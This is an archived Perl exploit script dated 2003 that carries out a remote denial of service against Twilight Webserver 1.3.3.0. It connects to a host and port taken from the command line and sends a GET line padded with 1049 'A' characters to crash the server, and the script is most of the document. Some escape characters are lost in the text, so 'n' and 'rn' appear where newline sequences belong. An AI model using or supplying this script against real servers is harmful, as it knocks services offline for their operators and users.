[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Twilight Webserver 1.3.3.0 (GET) Remote Denial of Service Exploit
# Published : 2003-07-07
# Author : n/a
# Previous Title : Cisco IOS IPv4 Packets Denial of Service Exploit
# Next Title : MS Windows IIS 5.0 - 5.1 Remote Denial of Service Exploit
# Denial of Service Attack against Twilight Webserver v1.3.3.0
# http://www.twilightutilities.com
# Original author wanted the c code removed.
# /str0ke
use strict;
use IO::Socket;
sub usage
{
print "Denial of Service Attack against Twilight Webserver v1.3.3.0n";
print "Usage: $0 www.example.com portn";
exit ();
}
my $host= shift || &usage;
my $port= shift || 80;
my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp') or die("Connect issue");
# pretty close to the output of the c code.
print $sock "GET" . "A" x 1049 . "rn";
# www.Syue.com [2003-07-07]